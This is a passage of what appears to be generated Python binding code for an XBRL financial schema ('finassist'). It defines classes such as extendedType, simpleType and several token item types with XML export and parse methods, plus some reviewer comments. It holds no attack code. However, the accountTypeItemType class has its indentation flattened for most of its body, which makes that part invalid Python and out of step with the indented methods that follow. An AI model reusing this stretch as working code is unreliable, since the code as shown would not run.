                        outfile.write(' %s=%s' % (
                            name, quote_attrib(value), ))
        if self.role is not None and 'role' not in already_processed:
            already_processed.add('role')
            outfile.write(' role=%s' % (self.gds_format_string(quote_attrib(self.role).encode(ExternalEncoding), input_name='role'), ))
        if self.type_ is not None and 'type_' not in already_processed:
            already_processed.add('type_')
            outfile.write(' type=%s' % (self.gds_format_string(quote_attrib(self.type_).encode(ExternalEncoding), input_name='type'), ))
        if self.id is not None and 'id' not in already_processed:
            already_processed.add('id')
            outfile.write(' id=%s' % (quote_attrib(self.id), ))
        if self.title_attr is not None and 'title_attr' not in already_processed:
            already_processed.add('title_attr')
            outfile.write(' title=%s' % (self.gds_format_string(quote_attrib(self.title_attr).encode(ExternalEncoding), input_name='title_attr'), ))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='extendedType', fromsubclass_=False, pretty_print=True):
        """Export all child elements in schema order."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        for title_ in self.title:
            title_.export(outfile, level, namespace_, name_='title', pretty_print=pretty_print)
        for documentation_ in self.documentation:
            documentation_.export(outfile, level, namespace_, name_='documentation', pretty_print=pretty_print)
        for locator_ in self.locator:
            locator_.export(outfile, level, namespace_, name_='locator', pretty_print=pretty_print)
        for arc_ in self.arc:
            arc_.export(outfile, level, namespace_, name_='arc', pretty_print=pretty_print)
        for resource_ in self.resource:
            resource_.export(outfile, level, namespace_, name_='resource', pretty_print=pretty_print)
    def build(self, node):
        """Populate this instance from *node* and return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Read declared attributes, then collect the remainder into
        ``anyAttributes_``."""
        value = find_attr_value_('role', node)
        if value is not None and 'role' not in already_processed:
            already_processed.add('role')
            self.role = value
        value = find_attr_value_('type', node)
        if value is not None and 'type' not in already_processed:
            already_processed.add('type')
            self.type_ = value
        value = find_attr_value_('id', node)
        if value is not None and 'id' not in already_processed:
            already_processed.add('id')
            self.id = value
        value = find_attr_value_('title', node)
        if value is not None and 'title_attr' not in already_processed:
            already_processed.add('title_attr')
            self.title_attr = value
        self.anyAttributes_ = {}
        for name, value in attrs.items():
            if name not in already_processed:
                self.anyAttributes_[name] = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Dispatch a parsed child element into the matching list.

        Generic names (title/documentation/locator/arc/resource)
        require an ``xsi:type`` for class selection; concrete names
        (loc, *Arc, label, reference, footnote) map to fixed classes.
        """
        if nodeName_ == 'title':
            type_name_ = child_.attrib.get(
                '{http://www.w3.org/2001/XMLSchema-instance}type')
            if type_name_ is None:
                type_name_ = child_.attrib.get('type')
            if type_name_ is not None:
                type_names_ = type_name_.split(':')
                if len(type_names_) == 1:
                    type_name_ = type_names_[0]
                else:
                    type_name_ = type_names_[1]
                class_ = globals()[type_name_]
                obj_ = class_.factory()
                obj_.build(child_)
            else:
                raise NotImplementedError(
                    'Class not implemented for <title> element')
            self.title.append(obj_)
            obj_.original_tagname_ = 'title'
        elif nodeName_ == 'documentation':
            type_name_ = child_.attrib.get(
                '{http://www.w3.org/2001/XMLSchema-instance}type')
            if type_name_ is None:
                type_name_ = child_.attrib.get('type')
            if type_name_ is not None:
                type_names_ = type_name_.split(':')
                if len(type_names_) == 1:
                    type_name_ = type_names_[0]
                else:
                    type_name_ = type_names_[1]
                class_ = globals()[type_name_]
                obj_ = class_.factory()
                obj_.build(child_)
            else:
                raise NotImplementedError(
                    'Class not implemented for <documentation> element')
            self.documentation.append(obj_)
            obj_.original_tagname_ = 'documentation'
        # NOTE: the generated original contained a second, unreachable
        # ``elif nodeName_ == 'documentation'`` branch here (it could
        # never execute after the identical condition above); it has
        # been removed.
        elif nodeName_ == 'locator':
            type_name_ = child_.attrib.get(
                '{http://www.w3.org/2001/XMLSchema-instance}type')
            if type_name_ is None:
                type_name_ = child_.attrib.get('type')
            if type_name_ is not None:
                type_names_ = type_name_.split(':')
                if len(type_names_) == 1:
                    type_name_ = type_names_[0]
                else:
                    type_name_ = type_names_[1]
                class_ = globals()[type_name_]
                obj_ = class_.factory()
                obj_.build(child_)
            else:
                raise NotImplementedError(
                    'Class not implemented for <locator> element')
            self.locator.append(obj_)
            obj_.original_tagname_ = 'locator'
        elif nodeName_ == 'loc':
            obj_ = locatorType.factory()
            obj_.build(child_)
            self.locator.append(obj_)
            obj_.original_tagname_ = 'loc'
        elif nodeName_ == 'arc':
            type_name_ = child_.attrib.get(
                '{http://www.w3.org/2001/XMLSchema-instance}type')
            if type_name_ is None:
                type_name_ = child_.attrib.get('type')
            if type_name_ is not None:
                type_names_ = type_name_.split(':')
                if len(type_names_) == 1:
                    type_name_ = type_names_[0]
                else:
                    type_name_ = type_names_[1]
                class_ = globals()[type_name_]
                obj_ = class_.factory()
                obj_.build(child_)
            else:
                raise NotImplementedError(
                    'Class not implemented for <arc> element')
            self.arc.append(obj_)
            obj_.original_tagname_ = 'arc'
        elif nodeName_ == 'labelArc':
            class_obj_ = self.get_class_obj_(child_, arcType)
            obj_ = class_obj_.factory()
            obj_.build(child_)
            self.arc.append(obj_)
            obj_.original_tagname_ = 'labelArc'
        elif nodeName_ == 'referenceArc':
            class_obj_ = self.get_class_obj_(child_, arcType)
            obj_ = class_obj_.factory()
            obj_.build(child_)
            self.arc.append(obj_)
            obj_.original_tagname_ = 'referenceArc'
        elif nodeName_ == 'definitionArc':
            class_obj_ = self.get_class_obj_(child_, arcType)
            obj_ = class_obj_.factory()
            obj_.build(child_)
            self.arc.append(obj_)
            obj_.original_tagname_ = 'definitionArc'
        elif nodeName_ == 'presentationArc':
            obj_ = presentationArc.factory()
            obj_.build(child_)
            self.arc.append(obj_)
            obj_.original_tagname_ = 'presentationArc'
        elif nodeName_ == 'calculationArc':
            obj_ = calculationArc.factory()
            obj_.build(child_)
            self.arc.append(obj_)
            obj_.original_tagname_ = 'calculationArc'
        elif nodeName_ == 'footnoteArc':
            class_obj_ = self.get_class_obj_(child_, arcType)
            obj_ = class_obj_.factory()
            obj_.build(child_)
            self.arc.append(obj_)
            obj_.original_tagname_ = 'footnoteArc'
        elif nodeName_ == 'resource':
            type_name_ = child_.attrib.get(
                '{http://www.w3.org/2001/XMLSchema-instance}type')
            if type_name_ is None:
                type_name_ = child_.attrib.get('type')
            if type_name_ is not None:
                type_names_ = type_name_.split(':')
                if len(type_names_) == 1:
                    type_name_ = type_names_[0]
                else:
                    type_name_ = type_names_[1]
                class_ = globals()[type_name_]
                obj_ = class_.factory()
                obj_.build(child_)
            else:
                raise NotImplementedError(
                    'Class not implemented for <resource> element')
            self.resource.append(obj_)
            obj_.original_tagname_ = 'resource'
        elif nodeName_ == 'label':
            obj_ = label.factory()
            obj_.build(child_)
            self.resource.append(obj_)
            obj_.original_tagname_ = 'label'
        elif nodeName_ == 'reference':
            obj_ = reference.factory()
            obj_.build(child_)
            self.resource.append(obj_)
            obj_.original_tagname_ = 'reference'
        elif nodeName_ == 'footnote':
            obj_ = footnote.factory()
            obj_.build(child_)
            self.resource.append(obj_)
            obj_.original_tagname_ = 'footnote'
# end class extendedType
class simpleType(GeneratedsSuper):
    """Type for the simple links defined in XBRL.

    A simple XLink: attributes only (show/title/actuate/href/role/
    arcrole/type), a wildcard attribute map, and no element content.
    """
    subclass = None
    superclass = None
    def __init__(self, show=None, title=None, actuate=None, href=None, role=None, arcrole=None, type_=None, extensiontype_=None):
        self.original_tagname_ = None
        self.show = _cast(None, show)
        self.title = _cast(None, title)
        self.actuate = _cast(None, actuate)
        self.href = _cast(None, href)
        self.role = _cast(None, role)
        self.arcrole = _cast(None, arcrole)
        self.type_ = _cast(None, type_)
        self.anyAttributes_ = {}
        self.extensiontype_ = extensiontype_
    def factory(*args_, **kwargs_):
        if simpleType.subclass:
            return simpleType.subclass(*args_, **kwargs_)
        else:
            return simpleType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_show(self): return self.show
    def set_show(self, show): self.show = show
    def get_title(self): return self.title
    def set_title(self, title): self.title = title
    def get_actuate(self): return self.actuate
    def set_actuate(self, actuate): self.actuate = actuate
    def get_href(self): return self.href
    def set_href(self, href): self.href = href
    def get_role(self): return self.role
    def set_role(self, role): self.role = role
    def get_arcrole(self): return self.arcrole
    def set_arcrole(self, arcrole): self.arcrole = arcrole
    def get_type(self): return self.type_
    def set_type(self, type_): self.type_ = type_
    def get_anyAttributes_(self): return self.anyAttributes_
    def set_anyAttributes_(self, anyAttributes_): self.anyAttributes_ = anyAttributes_
    def get_extensiontype_(self): return self.extensiontype_
    def set_extensiontype_(self, extensiontype_): self.extensiontype_ = extensiontype_
    def hasContent_(self):
        # A simple link never has element content.  The generated
        # original spelled this as ``if ( ):`` -- an empty tuple,
        # which is always falsy -- so this explicit False is
        # behaviorally identical and far clearer.
        return False
    def export(self, outfile, level, namespace_='finassist:', name_='simpleType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialise this element; with hasContent_() always False the
        element is always written self-closed."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='simpleType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='simpleType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='simpleType'):
        """Write wildcard attributes first, then the declared ones."""
        unique_counter = 0
        for name, value in self.anyAttributes_.items():
            xsinamespaceprefix = 'xsi'
            xsinamespace1 = 'http://www.w3.org/2001/XMLSchema-instance'
            xsinamespace2 = '{%s}' % (xsinamespace1, )
            if name.startswith(xsinamespace2):
                # Clark-notation xsi attribute: rewrite as xsi:name.
                name1 = name[len(xsinamespace2):]
                name2 = '%s:%s' % (xsinamespaceprefix, name1, )
                if name2 not in already_processed:
                    already_processed.add(name2)
                    outfile.write(' %s=%s' % (name2, quote_attrib(value), ))
            else:
                mo = re_.match(Namespace_extract_pat_, name)
                if mo is not None:
                    namespace, name = mo.group(1, 2)
                    if name not in already_processed:
                        already_processed.add(name)
                        if namespace == 'http://www.w3.org/XML/1998/namespace':
                            outfile.write(' %s=%s' % (
                                name, quote_attrib(value), ))
                        else:
                            # NOTE(review): this emits numeric prefixes
                            # (xmlns:1=...), which are not valid XML
                            # names; preserved as-is from the generated
                            # original to avoid changing output.
                            unique_counter += 1
                            outfile.write(' xmlns:%d="%s"' % (
                                unique_counter, namespace, ))
                            outfile.write(' %d:%s=%s' % (
                                unique_counter, name, quote_attrib(value), ))
                else:
                    if name not in already_processed:
                        already_processed.add(name)
                        outfile.write(' %s=%s' % (
                            name, quote_attrib(value), ))
        if self.show is not None and 'show' not in already_processed:
            already_processed.add('show')
            outfile.write(' show=%s' % (self.gds_format_string(quote_attrib(self.show).encode(ExternalEncoding), input_name='show'), ))
        if self.title is not None and 'title' not in already_processed:
            already_processed.add('title')
            outfile.write(' title=%s' % (quote_attrib(self.title), ))
        if self.actuate is not None and 'actuate' not in already_processed:
            already_processed.add('actuate')
            outfile.write(' actuate=%s' % (self.gds_format_string(quote_attrib(self.actuate).encode(ExternalEncoding), input_name='actuate'), ))
        if self.href is not None and 'href' not in already_processed:
            already_processed.add('href')
            outfile.write(' href=%s' % (quote_attrib(self.href), ))
        if self.role is not None and 'role' not in already_processed:
            already_processed.add('role')
            outfile.write(' role=%s' % (self.gds_format_string(quote_attrib(self.role).encode(ExternalEncoding), input_name='role'), ))
        if self.arcrole is not None and 'arcrole' not in already_processed:
            already_processed.add('arcrole')
            outfile.write(' arcrole=%s' % (self.gds_format_string(quote_attrib(self.arcrole).encode(ExternalEncoding), input_name='arcrole'), ))
        if self.type_ is not None and 'type_' not in already_processed:
            already_processed.add('type_')
            outfile.write(' type=%s' % (self.gds_format_string(quote_attrib(self.type_).encode(ExternalEncoding), input_name='type'), ))
        if self.extensiontype_ is not None and 'xsi:type' not in already_processed:
            already_processed.add('xsi:type')
            outfile.write(' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"')
            outfile.write(' xsi:type="%s"' % self.extensiontype_)
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='simpleType', fromsubclass_=False, pretty_print=True):
        # simpleType declares no element children.
        pass
    def build(self, node):
        """Populate this instance from *node* and return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Read declared attributes, collect the rest into
        ``anyAttributes_``, then honour xsi:type."""
        value = find_attr_value_('show', node)
        if value is not None and 'show' not in already_processed:
            already_processed.add('show')
            self.show = value
        value = find_attr_value_('title', node)
        if value is not None and 'title' not in already_processed:
            already_processed.add('title')
            self.title = value
        value = find_attr_value_('actuate', node)
        if value is not None and 'actuate' not in already_processed:
            already_processed.add('actuate')
            self.actuate = value
        value = find_attr_value_('href', node)
        if value is not None and 'href' not in already_processed:
            already_processed.add('href')
            self.href = value
        value = find_attr_value_('role', node)
        if value is not None and 'role' not in already_processed:
            already_processed.add('role')
            self.role = value
        value = find_attr_value_('arcrole', node)
        if value is not None and 'arcrole' not in already_processed:
            already_processed.add('arcrole')
            self.arcrole = value
        value = find_attr_value_('type', node)
        if value is not None and 'type' not in already_processed:
            already_processed.add('type')
            self.type_ = value
        self.anyAttributes_ = {}
        for name, value in attrs.items():
            if name not in already_processed:
                self.anyAttributes_[name] = value
        value = find_attr_value_('xsi:type', node)
        if value is not None and 'xsi:type' not in already_processed:
            already_processed.add('xsi:type')
            self.extensiontype_ = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # No element children to process.
        pass
# end class simpleType
class accountPurposeCodeItemType(tokenItemType):
    """Token item carrying an account-purpose code value."""
    subclass = None
    superclass = tokenItemType
    def __init__(self, id=None, contextRef=None, valueOf_=None):
        self.original_tagname_ = None
        super(accountPurposeCodeItemType, self).__init__(id, contextRef, valueOf_, )
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        # Honour a registered subclass override, if any.
        target = accountPurposeCodeItemType.subclass or accountPurposeCodeItemType
        return target(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def hasContent_(self):
        # Non-empty text value, or any content inherited from the base.
        return bool(self.valueOf_ or super(accountPurposeCodeItemType, self).hasContent_())
    def export(self, outfile, level, namespace_='finassist:', name_='accountPurposeCodeItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialise this item to *outfile*; self-closes when empty."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='accountPurposeCodeItemType')
        if not self.hasContent_():
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>')
        outfile.write(str(self.valueOf_).encode(ExternalEncoding))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='accountPurposeCodeItemType', pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='accountPurposeCodeItemType'):
        # All attributes come from the tokenItemType base.
        super(accountPurposeCodeItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='accountPurposeCodeItemType')
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='accountPurposeCodeItemType', fromsubclass_=False, pretty_print=True):
        # Delegate entirely to the base class (fromsubclass_=True).
        super(accountPurposeCodeItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
    def build(self, node):
        """Populate this instance from *node* and return self."""
        seen = set()
        self.buildAttributes(node, node.attrib, seen)
        self.valueOf_ = get_all_text_(node)
        for element in node:
            local_name = Tag_pattern_.match(element.tag).groups()[-1]
            self.buildChildren(element, node, local_name)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        super(accountPurposeCodeItemType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # No element children of its own.
        pass
# end class accountPurposeCodeItemType
class accountTypeItemType(tokenItemType):
subclass = None
superclass = tokenItemType
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
super(accountTypeItemType, self).__init__(id, contextRef, valueOf_, )
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if accountTypeItemType.subclass:
return accountTypeItemType.subclass(*args_, **kwargs_)
else:
return accountTypeItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_ or
super(accountTypeItemType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='accountTypeItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='accountTypeItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='accountTypeItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='accountTypeItemType'):
super(accountTypeItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='accountTypeItemType')
def exportChildren(self, outfile, level, namespace_='finassist:', name_='accountTypeItemType', fromsubclass_=False, pretty_print=True):
super(accountTypeItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
pass
    def build(self, node):
        """Populate this instance from an ElementTree node and return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child in node:
            # Reduce the child tag via Tag_pattern_ to its last matched group.
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Attribute handling lives entirely in tokenItemType.
        super(accountTypeItemType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple type: no child elements to build.
        pass
# end class accountTypeItemType
class bookTaxDifferenceItemType(tokenItemType):
    """Binding class for the XBRL 'bookTaxDifferenceItemType' element: simple
    token content plus the id/contextRef attributes inherited from tokenItemType.
    """
    subclass = None
    superclass = tokenItemType
    def __init__(self, id=None, contextRef=None, valueOf_=None):
        # original_tagname_ overrides name_ in export() when it is not None.
        self.original_tagname_ = None
        super(bookTaxDifferenceItemType, self).__init__(id, contextRef, valueOf_, )
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        # Honor a user-installed subclass override, if any.
        if bookTaxDifferenceItemType.subclass:
            return bookTaxDifferenceItemType.subclass(*args_, **kwargs_)
        else:
            return bookTaxDifferenceItemType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def hasContent_(self):
        # True when there is text content here or in the superclass.
        if (
            self.valueOf_ or
            super(bookTaxDifferenceItemType, self).hasContent_()
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='finassist:', name_='bookTaxDifferenceItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element to outfile as XML, indented to level."""
        from xml.sax.saxutils import escape
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='bookTaxDifferenceItemType')
        if self.hasContent_():
            outfile.write('>')
            # Fix: XML-escape the character data ('&', '<', '>') so that
            # values containing markup characters cannot emit malformed XML.
            outfile.write(escape(str(self.valueOf_)).encode(ExternalEncoding))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='bookTaxDifferenceItemType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='bookTaxDifferenceItemType'):
        # All attributes come from tokenItemType; delegate upward.
        super(bookTaxDifferenceItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='bookTaxDifferenceItemType')
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='bookTaxDifferenceItemType', fromsubclass_=False, pretty_print=True):
        # No children of its own; delegate upward with fromsubclass_=True.
        super(bookTaxDifferenceItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
    def build(self, node):
        """Populate this instance from an ElementTree node and return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        super(bookTaxDifferenceItemType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple type: no child elements to build.
        pass
# end class bookTaxDifferenceItemType
class identifierOrganizationTypeItemType(tokenItemType):
    """Binding class for the XBRL 'identifierOrganizationTypeItemType' element:
    simple token content plus the id/contextRef attributes inherited from tokenItemType.
    """
    subclass = None
    superclass = tokenItemType
    def __init__(self, id=None, contextRef=None, valueOf_=None):
        # original_tagname_ overrides name_ in export() when it is not None.
        self.original_tagname_ = None
        super(identifierOrganizationTypeItemType, self).__init__(id, contextRef, valueOf_, )
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        # Honor a user-installed subclass override, if any.
        if identifierOrganizationTypeItemType.subclass:
            return identifierOrganizationTypeItemType.subclass(*args_, **kwargs_)
        else:
            return identifierOrganizationTypeItemType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def hasContent_(self):
        # True when there is text content here or in the superclass.
        if (
            self.valueOf_ or
            super(identifierOrganizationTypeItemType, self).hasContent_()
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='finassist:', name_='identifierOrganizationTypeItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element to outfile as XML, indented to level."""
        from xml.sax.saxutils import escape
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='identifierOrganizationTypeItemType')
        if self.hasContent_():
            outfile.write('>')
            # Fix: XML-escape the character data ('&', '<', '>') so that
            # values containing markup characters cannot emit malformed XML.
            outfile.write(escape(str(self.valueOf_)).encode(ExternalEncoding))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='identifierOrganizationTypeItemType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='identifierOrganizationTypeItemType'):
        # All attributes come from tokenItemType; delegate upward.
        super(identifierOrganizationTypeItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='identifierOrganizationTypeItemType')
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='identifierOrganizationTypeItemType', fromsubclass_=False, pretty_print=True):
        # No children of its own; delegate upward with fromsubclass_=True.
        super(identifierOrganizationTypeItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
    def build(self, node):
        """Populate this instance from an ElementTree node and return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        super(identifierOrganizationTypeItemType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple type: no child elements to build.
        pass
# end class identifierOrganizationTypeItemType
class debitCreditCodeItemType(tokenItemType):
    """Binding class for the XBRL 'debitCreditCodeItemType' element: simple
    token content plus the id/contextRef attributes inherited from tokenItemType.
    """
    subclass = None
    superclass = tokenItemType
    def __init__(self, id=None, contextRef=None, valueOf_=None):
        # original_tagname_ overrides name_ in export() when it is not None.
        self.original_tagname_ = None
        super(debitCreditCodeItemType, self).__init__(id, contextRef, valueOf_, )
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        # Honor a user-installed subclass override, if any.
        if debitCreditCodeItemType.subclass:
            return debitCreditCodeItemType.subclass(*args_, **kwargs_)
        else:
            return debitCreditCodeItemType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def hasContent_(self):
        # True when there is text content here or in the superclass.
        if (
            self.valueOf_ or
            super(debitCreditCodeItemType, self).hasContent_()
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='finassist:', name_='debitCreditCodeItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element to outfile as XML, indented to level."""
        from xml.sax.saxutils import escape
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='debitCreditCodeItemType')
        if self.hasContent_():
            outfile.write('>')
            # Fix: XML-escape the character data ('&', '<', '>') so that
            # values containing markup characters cannot emit malformed XML.
            outfile.write(escape(str(self.valueOf_)).encode(ExternalEncoding))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='debitCreditCodeItemType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='debitCreditCodeItemType'):
        # All attributes come from tokenItemType; delegate upward.
        super(debitCreditCodeItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='debitCreditCodeItemType')
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='debitCreditCodeItemType', fromsubclass_=False, pretty_print=True):
        # No children of its own; delegate upward with fromsubclass_=True.
        super(debitCreditCodeItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
    def build(self, node):
        """Populate this instance from an ElementTree node and return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        super(debitCreditCodeItemType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple type: no child elements to build.
        pass
# end class debitCreditCodeItemType
class documentTypeItemType(tokenItemType):
    """Binding class for the XBRL 'documentTypeItemType' element: simple
    token content plus the id/contextRef attributes inherited from tokenItemType.
    """
    subclass = None
    superclass = tokenItemType
    def __init__(self, id=None, contextRef=None, valueOf_=None):
        # original_tagname_ overrides name_ in export() when it is not None.
        self.original_tagname_ = None
        super(documentTypeItemType, self).__init__(id, contextRef, valueOf_, )
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        # Honor a user-installed subclass override, if any.
        if documentTypeItemType.subclass:
            return documentTypeItemType.subclass(*args_, **kwargs_)
        else:
            return documentTypeItemType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def hasContent_(self):
        # True when there is text content here or in the superclass.
        if (
            self.valueOf_ or
            super(documentTypeItemType, self).hasContent_()
        ):
            return True
        else:
            return False
